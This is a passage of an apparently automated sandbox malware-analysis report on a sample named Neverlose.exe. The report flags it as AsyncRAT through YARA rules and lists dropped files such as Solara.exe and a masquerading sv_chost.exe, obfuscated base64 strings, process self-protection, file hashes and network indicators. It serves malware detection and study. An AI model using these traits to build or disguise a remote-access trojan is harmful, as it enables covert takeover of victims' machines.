                  Source: powershell.exe, 00000001.00000002.1705141692.000000000584A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1705141692.00000000059BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000001.00000002.1708078820.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1873584903.000001B390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2035739099.00000243405D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2242695799.000002DC7232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://partner.github.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                  Source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txtd
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com/learn/pathways
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skills.github.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://user-images.githubusercontent.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2

                  Operating System Destruction

                  barindex
                  Protects its processes via BreakOnTermination flag
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 4.0.Solara.exe.da0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.Neverlose.exe.3942eb0.5.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.Neverlose.exe.3939200.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  PE file has nameless sections
                  Source: Neverlose.exeStatic PE information: section name:
                  Source: Neverlose.exeStatic PE information: section name:
                  Source: Neverlose.exeStatic PE information: section name:
                  Source: Neverlose.exeStatic PE information: section name:
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_010232A60_2_010232A6
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_02E740F00_2_02E740F0
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_02E711600_2_02E71160
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_02E747A00_2_02E747A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F6B4901_2_04F6B490
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F6B4701_2_04F6B470
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F60C621_2_04F60C62
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08F93A981_2_08F93A98
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 4_2_00007FFD9B6985864_2_00007FFD9B698586
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 4_2_00007FFD9B6916794_2_00007FFD9B691679
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 4_2_00007FFD9B6993324_2_00007FFD9B699332
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 4_2_00007FFD9B6913AD4_2_00007FFD9B6913AD
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 4_2_00007FFD9B69204D4_2_00007FFD9B69204D
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 4_2_00007FFD9B6916B94_2_00007FFD9B6916B9
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 4_2_00007FFD9B690EFA4_2_00007FFD9B690EFA
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 5_2_013108905_2_01310890
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 5_2_013108805_2_01310880
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 10_2_00007FFD9B69167910_2_00007FFD9B691679
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 10_2_00007FFD9B69204D10_2_00007FFD9B69204D
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 10_2_00007FFD9B6916B910_2_00007FFD9B6916B9
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 10_2_00007FFD9B690EFA10_2_00007FFD9B690EFA
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 15_2_00007FFD9B68167915_2_00007FFD9B681679
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 15_2_00007FFD9B68204D15_2_00007FFD9B68204D
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 15_2_00007FFD9B6816B915_2_00007FFD9B6816B9
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeCode function: 15_2_00007FFD9B680EFA15_2_00007FFD9B680EFA
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 24_2_00007FFD9B6B167924_2_00007FFD9B6B1679
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 24_2_00007FFD9B6B204D24_2_00007FFD9B6B204D
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 24_2_00007FFD9B6B16B924_2_00007FFD9B6B16B9
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 24_2_00007FFD9B6B0EFA24_2_00007FFD9B6B0EFA
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 25_2_00007FFD9B6C167925_2_00007FFD9B6C1679
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 25_2_00007FFD9B6C204D25_2_00007FFD9B6C204D
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 25_2_00007FFD9B6C16B925_2_00007FFD9B6C16B9
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 25_2_00007FFD9B6C0EFA25_2_00007FFD9B6C0EFA
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 26_2_00007FFD9B6C167926_2_00007FFD9B6C1679
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 26_2_00007FFD9B6C204D26_2_00007FFD9B6C204D
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 26_2_00007FFD9B6C16B926_2_00007FFD9B6C16B9
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeCode function: 26_2_00007FFD9B6C0EFA26_2_00007FFD9B6C0EFA
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Solara.exe 645697F87E53786ED389243B7C493452D1F4DDE157741BBE27D31F4BD87F833B
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\sv_chost.exe 645697F87E53786ED389243B7C493452D1F4DDE157741BBE27D31F4BD87F833B
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: String function: 0100C264 appears 99 times
                  Source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs Neverlose.exe
                  Source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExloader.exe4 vs Neverlose.exe
                  Source: Neverlose.exe, 00000000.00000002.1726255425.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameS vs Neverlose.exe
                  Source: Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs Neverlose.exe
                  Source: Neverlose.exe, 00000000.00000000.1661428680.0000000001006000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSolar.exe4 vs Neverlose.exe
                  Source: Neverlose.exeBinary or memory string: OriginalFilenameSolar.exe4 vs Neverlose.exe
                  Source: Neverlose.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 4.0.Solara.exe.da0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.Neverlose.exe.3942eb0.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.Neverlose.exe.3939200.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: Neverlose.exeStatic PE information: Section: ZLIB complexity 1.000396728515625
                  Source: Neverlose.exeStatic PE information: Section: ZLIB complexity 1.021484375
                  Source: Neverlose.exeStatic PE information: Section: .data ZLIB complexity 0.9972337805706522
                  Source: Solara.exe.0.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Solara.exe.0.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Solara.exe.0.dr, E8phRKCKw5AfpQsOlZWL2sYGK.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, rKw0lbvJvj9v9nQmNRYVdkaAc.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, rKw0lbvJvj9v9nQmNRYVdkaAc.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, E8phRKCKw5AfpQsOlZWL2sYGK.csCryptographic APIs: 'TransformFinalBlock'
                  Source: sv_chost.exe.4.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.csCryptographic APIs: 'TransformFinalBlock'
                  Source: sv_chost.exe.4.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.csCryptographic APIs: 'TransformFinalBlock'
                  Source: sv_chost.exe.4.dr, E8phRKCKw5AfpQsOlZWL2sYGK.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Solara.exe.0.dr, FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.csBase64 encoded string: 'ZlWq0vOHV47P8smKEgnpoR4f0pmeGeOJSJzUoTKZBirfgB368AyOdTG2pvbs', 'MlpVLMsyL3MQ8UzeeUh5jb7o1tL46G0C1S2BF94nvDqLzpkN1pF8YMwAFf96'
                  Source: Solara.exe.0.dr, YkmDGDOksHr5qrnsfF4B2F4yTHPN8Jh3v2Y5xPFK1ucmal0ibb0PwQ2xw1gyde4c6.csBase64 encoded string: 'owkEInksJw6uLbHd1asDQ0GRfBT2pcEsGoziQEeTYBXK3vnkul284PUsHXt7', 'SqOjRI22OqON4cxZl40CFSc2hcsIthEgxjzG1HrUNsrix73DVKoOhEds1fxP'
                  Source: Solara.exe.0.dr, Wj3PjIfqD1OSSp0iwZycbM1aD.csBase64 encoded string: 'pYwN7tircv5ttVuUHFbTsfAoTIpP5AnebDE20BSi0MVJW6ctfkeYXvLD5ZBN'
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.csBase64 encoded string: 'TwyA7zt3EDNnlbNEXzWFXC2BkibnwvpHS4OJK4wj4mbx9D5DGxwHc8NUAbdX', 'Tq85S24eKnWENne74CNJjWJzOXPHN62RfgAqPLQ6wy9p3jgQREc87YHKxvpn', 'ujWPyvxUq9QfOvgKulpdSyZGkbcZ2QoDtHq5o2oyPzQbdWcydkr2xnLN6L43', 'ihvvvkLCjLWPtiXfCuFu6pSACpRuEMhvUei3AKry76MRezxjvGJeCM8UnjK1', 'YsXN4FLGEvmrjugyDRqfuss8BYb16UYXXw5hep0Z8g8mVOtCyT9JDPpH7lIl', 'QIKf2cy5kTLFUVW4rboChf9fs1xKT85ka4vArmDXfdRXZK7P9O95ti18Fxuv', 'h0N3Eecg4eyTHegs9mqvqfnzctLswbQ8STQgTknOM1KklSTo1cq4oPawwzLr'
                  Source: Solara.exe.0.dr, P2XOur6bqoe5LxNtDHyiL3aGh.csBase64 encoded string: 'WRSn4awDFXjFcMb7NhnccjmZFB5Gx6Z6l76tMerDHIrGqKXyxdbjAdZ1BpsJ'
                  Source: Solara.exe.0.dr, 9anJqYyVCjcrXTuH1GzopYW8wzyY78Cd40FBQZs2D00E8Ibmuz0NNIGaS8nPFW6rEQFzkcsRuNbLEld04TJOzbVcsq03WRbNSG.csBase64 encoded string: 'hwHBtxzU1vNyn7VS0QnzlShGBDsSkdCwlmH15VDRTPulAY9ZhIgPdhqUingX', 'YROvapJV4jLXmqSnmlJHw9jjYNAXshm91bWRoKA9fgFV84VoVjbXXgxmXCGY'
                  Source: Solara.exe.0.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csBase64 encoded string: 'heKmWSALDlWFL20gspoKjSgjfY2mQna2tZYZUiemEDX7JENQHwL6cd8u8TD8', 'ZscL7SAqCgHy04wO9erh2SXA0ww20zLJtBfvpiaZPQqvHC7cJIVETdsWuauq', 'jWzM2a2KnCzchqUFpWR04dXb6GjMLcZ7PsH8E0dDTWsZA7CaGB6eAMImX4uI', 'rUbkJpkp9Me9rnSJvjDmlO8oNf7ttjWGXN6gn5P8CiYeGKfk82XGE6d1VEr1', 'VXUcx9W0fv5eysauHhPkwqKZBewq6uDZr8IwXG5sNAMCsix9Bi2k3sp7rnK5', 'HuV2yF3Xhr5JvtDIObe19P77lJThcuPA1r8rUVF1FeerETqRwhyo3a7TDgUr', 'ol68sad9kzwaT0c1LQIenPt0qwOIUHyUNbHVezXj6ZYBVi5mpfS8cTapflEJ', 'vcJNFRIz2NCwoOsKgVN5r0C48MDA9BGbPCif3MnM9a4eMi0IQhL4nX8rvXw9', 'KwGAB22mwYYriNCPGDxtdFRWHNCCiXfI3V82H9ebSdPY9Lr2GwBehV099MB7'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.csBase64 encoded string: 'ZlWq0vOHV47P8smKEgnpoR4f0pmeGeOJSJzUoTKZBirfgB368AyOdTG2pvbs', 'MlpVLMsyL3MQ8UzeeUh5jb7o1tL46G0C1S2BF94nvDqLzpkN1pF8YMwAFf96'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, YkmDGDOksHr5qrnsfF4B2F4yTHPN8Jh3v2Y5xPFK1ucmal0ibb0PwQ2xw1gyde4c6.csBase64 encoded string: 'owkEInksJw6uLbHd1asDQ0GRfBT2pcEsGoziQEeTYBXK3vnkul284PUsHXt7', 'SqOjRI22OqON4cxZl40CFSc2hcsIthEgxjzG1HrUNsrix73DVKoOhEds1fxP'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Wj3PjIfqD1OSSp0iwZycbM1aD.csBase64 encoded string: 'pYwN7tircv5ttVuUHFbTsfAoTIpP5AnebDE20BSi0MVJW6ctfkeYXvLD5ZBN'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.csBase64 encoded string: 'TwyA7zt3EDNnlbNEXzWFXC2BkibnwvpHS4OJK4wj4mbx9D5DGxwHc8NUAbdX', 'Tq85S24eKnWENne74CNJjWJzOXPHN62RfgAqPLQ6wy9p3jgQREc87YHKxvpn', 'ujWPyvxUq9QfOvgKulpdSyZGkbcZ2QoDtHq5o2oyPzQbdWcydkr2xnLN6L43', 'ihvvvkLCjLWPtiXfCuFu6pSACpRuEMhvUei3AKry76MRezxjvGJeCM8UnjK1', 'YsXN4FLGEvmrjugyDRqfuss8BYb16UYXXw5hep0Z8g8mVOtCyT9JDPpH7lIl', 'QIKf2cy5kTLFUVW4rboChf9fs1xKT85ka4vArmDXfdRXZK7P9O95ti18Fxuv', 'h0N3Eecg4eyTHegs9mqvqfnzctLswbQ8STQgTknOM1KklSTo1cq4oPawwzLr'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, P2XOur6bqoe5LxNtDHyiL3aGh.csBase64 encoded string: 'WRSn4awDFXjFcMb7NhnccjmZFB5Gx6Z6l76tMerDHIrGqKXyxdbjAdZ1BpsJ'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, 9anJqYyVCjcrXTuH1GzopYW8wzyY78Cd40FBQZs2D00E8Ibmuz0NNIGaS8nPFW6rEQFzkcsRuNbLEld04TJOzbVcsq03WRbNSG.csBase64 encoded string: 'hwHBtxzU1vNyn7VS0QnzlShGBDsSkdCwlmH15VDRTPulAY9ZhIgPdhqUingX', 'YROvapJV4jLXmqSnmlJHw9jjYNAXshm91bWRoKA9fgFV84VoVjbXXgxmXCGY'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csBase64 encoded string: 'heKmWSALDlWFL20gspoKjSgjfY2mQna2tZYZUiemEDX7JENQHwL6cd8u8TD8', 'ZscL7SAqCgHy04wO9erh2SXA0ww20zLJtBfvpiaZPQqvHC7cJIVETdsWuauq', 'jWzM2a2KnCzchqUFpWR04dXb6GjMLcZ7PsH8E0dDTWsZA7CaGB6eAMImX4uI', 'rUbkJpkp9Me9rnSJvjDmlO8oNf7ttjWGXN6gn5P8CiYeGKfk82XGE6d1VEr1', 'VXUcx9W0fv5eysauHhPkwqKZBewq6uDZr8IwXG5sNAMCsix9Bi2k3sp7rnK5', 'HuV2yF3Xhr5JvtDIObe19P77lJThcuPA1r8rUVF1FeerETqRwhyo3a7TDgUr', 'ol68sad9kzwaT0c1LQIenPt0qwOIUHyUNbHVezXj6ZYBVi5mpfS8cTapflEJ', 'vcJNFRIz2NCwoOsKgVN5r0C48MDA9BGbPCif3MnM9a4eMi0IQhL4nX8rvXw9', 'KwGAB22mwYYriNCPGDxtdFRWHNCCiXfI3V82H9ebSdPY9Lr2GwBehV099MB7'
                  Source: sv_chost.exe.4.dr, FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.csBase64 encoded string: 'ZlWq0vOHV47P8smKEgnpoR4f0pmeGeOJSJzUoTKZBirfgB368AyOdTG2pvbs', 'MlpVLMsyL3MQ8UzeeUh5jb7o1tL46G0C1S2BF94nvDqLzpkN1pF8YMwAFf96'
                  Source: sv_chost.exe.4.dr, YkmDGDOksHr5qrnsfF4B2F4yTHPN8Jh3v2Y5xPFK1ucmal0ibb0PwQ2xw1gyde4c6.csBase64 encoded string: 'owkEInksJw6uLbHd1asDQ0GRfBT2pcEsGoziQEeTYBXK3vnkul284PUsHXt7', 'SqOjRI22OqON4cxZl40CFSc2hcsIthEgxjzG1HrUNsrix73DVKoOhEds1fxP'
                  Source: sv_chost.exe.4.dr, Wj3PjIfqD1OSSp0iwZycbM1aD.csBase64 encoded string: 'pYwN7tircv5ttVuUHFbTsfAoTIpP5AnebDE20BSi0MVJW6ctfkeYXvLD5ZBN'
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.csBase64 encoded string: 'TwyA7zt3EDNnlbNEXzWFXC2BkibnwvpHS4OJK4wj4mbx9D5DGxwHc8NUAbdX', 'Tq85S24eKnWENne74CNJjWJzOXPHN62RfgAqPLQ6wy9p3jgQREc87YHKxvpn', 'ujWPyvxUq9QfOvgKulpdSyZGkbcZ2QoDtHq5o2oyPzQbdWcydkr2xnLN6L43', 'ihvvvkLCjLWPtiXfCuFu6pSACpRuEMhvUei3AKry76MRezxjvGJeCM8UnjK1', 'YsXN4FLGEvmrjugyDRqfuss8BYb16UYXXw5hep0Z8g8mVOtCyT9JDPpH7lIl', 'QIKf2cy5kTLFUVW4rboChf9fs1xKT85ka4vArmDXfdRXZK7P9O95ti18Fxuv', 'h0N3Eecg4eyTHegs9mqvqfnzctLswbQ8STQgTknOM1KklSTo1cq4oPawwzLr'
                  Source: sv_chost.exe.4.dr, P2XOur6bqoe5LxNtDHyiL3aGh.csBase64 encoded string: 'WRSn4awDFXjFcMb7NhnccjmZFB5Gx6Z6l76tMerDHIrGqKXyxdbjAdZ1BpsJ'
                  Source: sv_chost.exe.4.dr, 9anJqYyVCjcrXTuH1GzopYW8wzyY78Cd40FBQZs2D00E8Ibmuz0NNIGaS8nPFW6rEQFzkcsRuNbLEld04TJOzbVcsq03WRbNSG.csBase64 encoded string: 'hwHBtxzU1vNyn7VS0QnzlShGBDsSkdCwlmH15VDRTPulAY9ZhIgPdhqUingX', 'YROvapJV4jLXmqSnmlJHw9jjYNAXshm91bWRoKA9fgFV84VoVjbXXgxmXCGY'
                  Source: sv_chost.exe.4.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csBase64 encoded string: 'heKmWSALDlWFL20gspoKjSgjfY2mQna2tZYZUiemEDX7JENQHwL6cd8u8TD8', 'ZscL7SAqCgHy04wO9erh2SXA0ww20zLJtBfvpiaZPQqvHC7cJIVETdsWuauq', 'jWzM2a2KnCzchqUFpWR04dXb6GjMLcZ7PsH8E0dDTWsZA7CaGB6eAMImX4uI', 'rUbkJpkp9Me9rnSJvjDmlO8oNf7ttjWGXN6gn5P8CiYeGKfk82XGE6d1VEr1', 'VXUcx9W0fv5eysauHhPkwqKZBewq6uDZr8IwXG5sNAMCsix9Bi2k3sp7rnK5', 'HuV2yF3Xhr5JvtDIObe19P77lJThcuPA1r8rUVF1FeerETqRwhyo3a7TDgUr', 'ol68sad9kzwaT0c1LQIenPt0qwOIUHyUNbHVezXj6ZYBVi5mpfS8cTapflEJ', 'vcJNFRIz2NCwoOsKgVN5r0C48MDA9BGbPCif3MnM9a4eMi0IQhL4nX8rvXw9', 'KwGAB22mwYYriNCPGDxtdFRWHNCCiXfI3V82H9ebSdPY9Lr2GwBehV099MB7'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: sv_chost.exe.4.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: sv_chost.exe.4.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: Solara.exe.0.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
